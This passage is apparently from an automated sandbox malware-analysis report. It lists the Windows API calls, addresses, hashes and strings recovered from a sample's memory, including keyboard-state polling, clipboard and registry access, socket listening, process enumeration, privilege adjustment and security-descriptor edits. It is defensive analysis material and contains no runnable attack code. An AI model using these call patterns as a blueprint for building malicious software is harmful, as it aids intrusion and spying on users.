                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                • String ID: *.*
                                                                                • API String ID: 1824444939-438819550
                                                                                • Opcode ID: c8f772ae078ab2bd529af0490220f4ef1b095538c7afe2afb96074d0d5c0ba18
                                                                                • Instruction ID: af2a4f542dcc294625cfb26ef1e5934ea10d2d51c845c9697beca23f9353300a
                                                                                • Opcode Fuzzy Hash: c8f772ae078ab2bd529af0490220f4ef1b095538c7afe2afb96074d0d5c0ba18
                                                                                • Instruction Fuzzy Hash: 8531F632600619AACF31EFA8DC49ADE77AC9F46364F50C552E809A2190DB78DE45CF64
                                                                                APIs
                                                                                • GetLocalTime.KERNEL32(?), ref: 007709DF
                                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 007709EF
                                                                                • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 007709FB
                                                                                • __wsplitpath.LIBCMT ref: 00770A59
                                                                                • _wcscat.LIBCMT ref: 00770A71
                                                                                • _wcscat.LIBCMT ref: 00770A83
                                                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00770A98
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00770AAC
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00770ADE
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00770AFF
                                                                                • _wcscpy.LIBCMT ref: 00770B0B
                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00770B4A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                                • String ID: *.*
                                                                                • API String ID: 3566783562-438819550
                                                                                • Opcode ID: dce23bcc7b609b2387a8a53bd7a9e994fb8a269613d38b0381984fa295795ef2
                                                                                • Instruction ID: 17814d7f249b635e9aff70a880edea2c9d1749dc11d7d962f2e5970de9d13ee5
                                                                                • Opcode Fuzzy Hash: dce23bcc7b609b2387a8a53bd7a9e994fb8a269613d38b0381984fa295795ef2
                                                                                • Instruction Fuzzy Hash: 9C612AB2504305DFDB10EF60C84599EB3E8FF89354F04892AF989C7252DB39EA45CB92
                                                                                APIs
                                                                                  • Part of subcall function 0075ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0075ABD7
                                                                                  • Part of subcall function 0075ABBB: GetLastError.KERNEL32(?,0075A69F,?,?,?), ref: 0075ABE1
                                                                                  • Part of subcall function 0075ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0075A69F,?,?,?), ref: 0075ABF0
                                                                                  • Part of subcall function 0075ABBB: HeapAlloc.KERNEL32(00000000,?,0075A69F,?,?,?), ref: 0075ABF7
                                                                                  • Part of subcall function 0075ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0075AC0E
                                                                                  • Part of subcall function 0075AC56: GetProcessHeap.KERNEL32(00000008,0075A6B5,00000000,00000000,?,0075A6B5,?), ref: 0075AC62
                                                                                  • Part of subcall function 0075AC56: HeapAlloc.KERNEL32(00000000,?,0075A6B5,?), ref: 0075AC69
                                                                                  • Part of subcall function 0075AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0075A6B5,?), ref: 0075AC7A
                                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0075A6D0
                                                                                • _memset.LIBCMT ref: 0075A6E5
                                                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0075A704
                                                                                • GetLengthSid.ADVAPI32(?), ref: 0075A715
                                                                                • GetAce.ADVAPI32(?,00000000,?), ref: 0075A752
                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0075A76E
                                                                                • GetLengthSid.ADVAPI32(?), ref: 0075A78B
                                                                                • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0075A79A
                                                                                • HeapAlloc.KERNEL32(00000000), ref: 0075A7A1
                                                                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0075A7C2
                                                                                • CopySid.ADVAPI32(00000000), ref: 0075A7C9
                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0075A7FA
                                                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0075A820
                                                                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0075A834
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                • String ID:
                                                                                • API String ID: 3996160137-0
                                                                                • Opcode ID: fb2c8144843e0fa7355dbdae958fdc7b0d50d5a8a6df24fae7a7e1017df9f451
                                                                                • Instruction ID: 2cb5fd7f62733e78dfea137ceb2d276a1f7f0ca7326d9b4b969478017fcd96b2
                                                                                • Opcode Fuzzy Hash: fb2c8144843e0fa7355dbdae958fdc7b0d50d5a8a6df24fae7a7e1017df9f451
                                                                                • Instruction Fuzzy Hash: 79515B71900209BFDF118FA0DC44AEEBBB9FF45305F048229E911A6290DB79AE09CB61
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: |$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$||| |
                                                                                • API String ID: 0-2454437154
                                                                                • Opcode ID: c61098fbbf63e232fc1c0dcc720b8d6f36bab8af82e53df1312bf00f87d5bf61
                                                                                • Instruction ID: 9ab95296275350f3b7b8dcf6dc70a93d5d78311e78ec4e3052bc33c4e30f63b5
                                                                                • Opcode Fuzzy Hash: c61098fbbf63e232fc1c0dcc720b8d6f36bab8af82e53df1312bf00f87d5bf61
                                                                                • Instruction Fuzzy Hash: 89728271E04229DBDF18DF58D8407AEB7B5FF49310F14816AE815EB281EB789E81DB90
                                                                                APIs
                                                                                  • Part of subcall function 00766EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00765FA6,?), ref: 00766ED8
                                                                                  • Part of subcall function 007672CB: GetFileAttributesW.KERNEL32(?,00766019), ref: 007672CC
                                                                                • _wcscat.LIBCMT ref: 00766441
                                                                                • __wsplitpath.LIBCMT ref: 0076645F
                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 00766474
                                                                                • _wcscpy.LIBCMT ref: 007664A3
                                                                                • _wcscat.LIBCMT ref: 007664B8
                                                                                • _wcscat.LIBCMT ref: 007664CA
                                                                                • DeleteFileW.KERNEL32(?), ref: 007664DA
                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 007664EB
                                                                                • FindClose.KERNEL32(00000000), ref: 00766506
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                                                • String ID: \*.*$p1Mw`KNw
                                                                                • API String ID: 2643075503-2160596699
                                                                                • Opcode ID: f768d89a4598f6b0f585cca299086632b1b657244c38441b8277332e2a7f30e7
                                                                                • Instruction ID: 95c5f515a24b0a0cff927002fbdc792ac56cd3e57331d1b43e35bf02b7c5403c
                                                                                • Opcode Fuzzy Hash: f768d89a4598f6b0f585cca299086632b1b657244c38441b8277332e2a7f30e7
                                                                                • Instruction Fuzzy Hash: A03157B24083849EC721DBA488899DB77DCAF55314F44491EFAD6C3141EB39D50D87A7
                                                                                APIs
                                                                                  • Part of subcall function 00783C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00782BB5,?,?), ref: 00783C1D
                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0078328E
                                                                                  • Part of subcall function 0072936C: __swprintf.LIBCMT ref: 007293AB
                                                                                  • Part of subcall function 0072936C: __itow.LIBCMT ref: 007293DF
                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0078332D
                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 007833C5
                                                                                • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00783604
                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00783611
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                • String ID:
                                                                                • API String ID: 1240663315-0
                                                                                • Opcode ID: 4b7a0a987f0d63763a65d8653b90218e300443de54354978af545587e8452dbf
                                                                                • Instruction ID: 64970f0b84f141aac404561373fc2a45c497a61166b3419f7ba3bdb375ed0754
                                                                                • Opcode Fuzzy Hash: 4b7a0a987f0d63763a65d8653b90218e300443de54354978af545587e8452dbf
                                                                                • Instruction Fuzzy Hash: 88E14B71604210EFCB15EF28C895E6ABBE8EF89710F04856DF54ADB262DB38ED05CB51
                                                                                APIs
                                                                                • GetKeyboardState.USER32(?), ref: 00762B5F
                                                                                • GetAsyncKeyState.USER32(000000A0), ref: 00762BE0
                                                                                • GetKeyState.USER32(000000A0), ref: 00762BFB
                                                                                • GetAsyncKeyState.USER32(000000A1), ref: 00762C15
                                                                                • GetKeyState.USER32(000000A1), ref: 00762C2A
                                                                                • GetAsyncKeyState.USER32(00000011), ref: 00762C42
                                                                                • GetKeyState.USER32(00000011), ref: 00762C54
                                                                                • GetAsyncKeyState.USER32(00000012), ref: 00762C6C
                                                                                • GetKeyState.USER32(00000012), ref: 00762C7E
                                                                                • GetAsyncKeyState.USER32(0000005B), ref: 00762C96
                                                                                • GetKeyState.USER32(0000005B), ref: 00762CA8
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: State$Async$Keyboard
                                                                                • String ID:
                                                                                • API String ID: 541375521-0
                                                                                • Opcode ID: 1cb3af35744db71a9bffa4a929dfe293dc1e33a198e8796fbff450879b57a412
                                                                                • Instruction ID: e854dbc7859fa17908315245154e38ae5871af4280f6320b2dda5182f88e83aa
                                                                                • Opcode Fuzzy Hash: 1cb3af35744db71a9bffa4a929dfe293dc1e33a198e8796fbff450879b57a412
                                                                                • Instruction Fuzzy Hash: 6A41F474904FC96DFFB59B6088043A9BEA0AB12344F048049DDC7566C3EBAC9DC9C7B6
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                • String ID:
                                                                                • API String ID: 1737998785-0
                                                                                • Opcode ID: 348612f6a7d25c7c1c3a594ea4f87c9e41323bbbd74d551f60a09583184f8af6
                                                                                • Instruction ID: df7624e98b2b6ca5ab4a245793c8a83b97bf82c0e7e2eb6deb36464a8eb708fb
                                                                                • Opcode Fuzzy Hash: 348612f6a7d25c7c1c3a594ea4f87c9e41323bbbd74d551f60a09583184f8af6
                                                                                • Instruction Fuzzy Hash: 7D217A31300614AFDF21AF64DC49B6D77A8EF89750F04C019F94ADB2A2DB38EC018B98
                                                                                APIs
                                                                                  • Part of subcall function 00759ABF: CLSIDFromProgID.OLE32 ref: 00759ADC
                                                                                  • Part of subcall function 00759ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 00759AF7
                                                                                  • Part of subcall function 00759ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 00759B05
                                                                                  • Part of subcall function 00759ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00759B15
                                                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 0077C235
                                                                                • _memset.LIBCMT ref: 0077C242
                                                                                • _memset.LIBCMT ref: 0077C360
                                                                                • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 0077C38C
                                                                                • CoTaskMemFree.OLE32(?), ref: 0077C397
                                                                                Strings
                                                                                • NULL Pointer assignment, xrefs: 0077C3E5
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                • String ID: NULL Pointer assignment
                                                                                • API String ID: 1300414916-2785691316
                                                                                • Opcode ID: 2773c966adaae60be1f8d8c088bed1b359deadd9030aaa251b1d93e751619646
                                                                                • Instruction ID: 5cc1c98105a47f69612635110b2cb4e45fa10aaebd699807e9e88e0f42e84218
                                                                                • Opcode Fuzzy Hash: 2773c966adaae60be1f8d8c088bed1b359deadd9030aaa251b1d93e751619646
                                                                                • Instruction Fuzzy Hash: 60913A71D00228EBDF11DF94DC85EDEBBB9AF08750F10816AF519A7281DB789A45CFA0
                                                                                APIs
                                                                                  • Part of subcall function 0075B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0075B180
                                                                                  • Part of subcall function 0075B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0075B1AD
                                                                                  • Part of subcall function 0075B134: GetLastError.KERNEL32 ref: 0075B1BA
                                                                                • ExitWindowsEx.USER32(?,00000000), ref: 00767A0F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                • String ID: $@$SeShutdownPrivilege
                                                                                • API String ID: 2234035333-194228
                                                                                • Opcode ID: 747ef567cb6f0e1f9de0699a387593bcaf7c70a1d6d6f577e238a5aa4eb6f2b3
                                                                                • Instruction ID: a7825e5a5227b23d82ae5c7973e756a683d9c07da63c89a576b85edd8783602c
                                                                                • Opcode Fuzzy Hash: 747ef567cb6f0e1f9de0699a387593bcaf7c70a1d6d6f577e238a5aa4eb6f2b3
                                                                                • Instruction Fuzzy Hash: 3F01F771658211AAF72C16BCCC4BBBF32589B003D9F248524BD13E20C2D9AC5E04C1B4
                                                                                APIs
                                                                                • socket.WSOCK32(00000002,00000001,00000006), ref: 00778CA8
                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00778CB7
                                                                                • bind.WSOCK32(00000000,?,00000010), ref: 00778CD3
                                                                                • listen.WSOCK32(00000000,00000005), ref: 00778CE2
                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00778CFC
                                                                                • closesocket.WSOCK32(00000000), ref: 00778D10
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                • String ID:
                                                                                • API String ID: 1279440585-0
                                                                                • Opcode ID: 1085f32ab08e390dedbc7bed0a01ad5134829c1e34793e6789ad83451cb9d68f
                                                                                • Instruction ID: ec05f040b0e0944aa0008699fc2bd1f22189906555fb975ea4e930e598b5a11e
                                                                                • Opcode Fuzzy Hash: 1085f32ab08e390dedbc7bed0a01ad5134829c1e34793e6789ad83451cb9d68f
                                                                                • Instruction Fuzzy Hash: CC21D231600210DFCB25EF64D949B6E77A9EF49350F14C158F95BA72D2CB38AD018B61
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 0075AFAE
                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 0075AFB5
                                                                                • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 0075AFC4
                                                                                • CloseHandle.KERNEL32(00000004), ref: 0075AFCF
                                                                                • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0075AFFE
                                                                                • DestroyEnvironmentBlock.USERENV(00000000), ref: 0075B012
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                • String ID:
                                                                                • API String ID: 1413079979-0
                                                                                • Opcode ID: ca26d705393aeabde6e1952fc8099d94a28e0a13d3db55e62c3cd5eed8c9a0cb
                                                                                • Instruction ID: 4a681604bc5891b005da59e1c859e77b7127be22d42e241f9be18c9db1a56fdc
                                                                                • Opcode Fuzzy Hash: ca26d705393aeabde6e1952fc8099d94a28e0a13d3db55e62c3cd5eed8c9a0cb
                                                                                • Instruction Fuzzy Hash: B2214FB2100209BFDF118F94DD09FEE7BA9AB45305F048125FD02A21A1C3B9DD15EB61
                                                                                APIs
                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00766554
                                                                                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00766564
                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 00766583
                                                                                • __wsplitpath.LIBCMT ref: 007665A7
                                                                                • _wcscat.LIBCMT ref: 007665BA
                                                                                • CloseHandle.KERNEL32(00000000,?,00000000), ref: 007665F9
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                                                • String ID:
                                                                                • API String ID: 1605983538-0
                                                                                • Opcode ID: 8ad16951b768fc2d6685a3f79d56ed3c4be602905336727737276654d07532f2
                                                                                • Instruction ID: 1165e3242e6df3b6d1ec688aba01f86370608784442a4fd4684653acfff23a05
                                                                                • Opcode Fuzzy Hash: 8ad16951b768fc2d6685a3f79d56ed3c4be602905336727737276654d07532f2
                                                                                • Instruction Fuzzy Hash: 2B218771900218EBDB20ABA4CC89FEDB7BCAB49300F5004A5F906D7141EB799F95CF61
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ERCP$VUUU$VUUU$VUUU$VUUU$|
                                                                                • API String ID: 0-3328300686
                                                                                • Opcode ID: d9dd4f9f8754e4c7cda3f9ef882282ebbbbfc1fc943b2763746acda147cf1df0
                                                                                • Instruction ID: 1de0367874c61515eb7db912801b7d905c88e4a735a817100e36ca53382ce8ae
                                                                                • Opcode Fuzzy Hash: d9dd4f9f8754e4c7cda3f9ef882282ebbbbfc1fc943b2763746acda147cf1df0
                                                                                • Instruction Fuzzy Hash: C892B271E0022ADBDF34CF58D8407BDB7B1BB95314F18829AD916AB281E7789D81CF91
                                                                                APIs
                                                                                • lstrlenW.KERNEL32(?,?,?,00000000), ref: 007613DC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
